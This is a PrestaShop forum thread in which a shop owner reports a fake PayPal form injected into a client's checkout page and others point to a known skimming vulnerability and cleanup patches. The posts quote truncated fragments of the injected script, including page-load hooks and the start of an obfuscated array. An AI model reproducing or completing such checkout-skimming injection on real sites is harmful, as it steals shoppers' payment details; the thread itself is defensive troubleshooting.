Fake Paypal payment form at order page, other payment modules not see at site.

[skur2000]

Hi friends.

old client site at prestashop 1.6.1.7 with custom - was attacked.

paypal module - not installed, paypal payment way on site - not integrated.

but at payment form https://xxxxxxxxxx.ua/quick-order

we see fake paypal form (screen)

(really at this site have other standart pay modules -  bank, cheque, and COD, but - They not visible!)

in sources page see bad codes(code listing),

we scan and find this with other variants and variables - nothing.

cleaning.zip - see more suspiciously files, but they not have bad codes (custom modules and theme)

has anyone encountered this ?

way to resolve this ?

----

how add example ?

script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="5d9bdb33b8cdd84910e78b76-|49">/script

body onload="WindowPaymentPaypal();

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(document).ready(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(window).load(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" var full = '--'; var _0xd951=

var _0x3977=["\x69\x6E\x70\x75\x74","\

and more 

Edited February 2, 2023 by skur2000
i edit url order page at site (see edit history)

[idnovate.com]

https://www.prestashop.com/forums/topic/1067200-hack-prestashop-sur-la-page-de-paiement-nettoyage/

[skur2000]

thanks, way and info this:

find Smarty_Internal_Validate::Validate

[idnovate.com]

Execute the script I posted, it will fix the issue.

[skur2000]

thanks -)

[Jurist]

Prestashop is under a global Magecart attack again. The last one was just about 6 months ago. 

We need an official stance from the Prestashop staff.

[Shin_P]

7 hours ago, skur2000 said:

Hi friends.

old client site at prestashop 1.6.1.7 with custom - was attacked.

paypal module - not installed, paypal payment way on site - not integrated.

but at payment form xxxxxxxxxxxxxxxxxxxxx

we see fake paypal form (screen)

(really at this site have other standart pay modules -  bank, cheque, and COD, but - They not visible!)

in sources page see bad codes(code listing),

we scan and find this with other variants and variables - nothing.

cleaning.zip - see more suspiciously files, but they not have bad codes (custom modules and theme)

has anyone encountered this ?

way to resolve this ?

----

how add example ?

script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="5d9bdb33b8cdd84910e78b76-|49">/script

body onload="WindowPaymentPaypal();

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(document).ready(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(window).load(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" var full = '--'; var _0xd951=

var _0x3977=["\x69\x6E\x70\x75\x74","\

and more 

 

careful the cart link still points to your website

[idnovate.com]

30 minutes ago, Jurist said:

Prestashop is under a global Magecart attack again. The last one was just about 6 months ago. 

We need an official stance from the Prestashop staff.

It is: https://build.prestashop-project.org/news/2022/major-security-vulnerability-on-prestashop-websites/

Do you mean a new vulnerability?

[Shin_P]

that's the first thing I tought about, but couldn't find any blm.php file on my server

[idnovate.com]

On 2/2/2023 at 4:19 PM, Shin_P said:

that's the first thing I tought about, but couldn't find any blm.php file on my server

I suppose it's a variation, but this script should fix it:

 

[Daresh]

Just had this virus on one of my customer's PS 1.6. shops. It helped to upload a clean /tools folder and add a patch to smarty.config.inc.php. It's also good to analyze the logs in case the attack came through some module.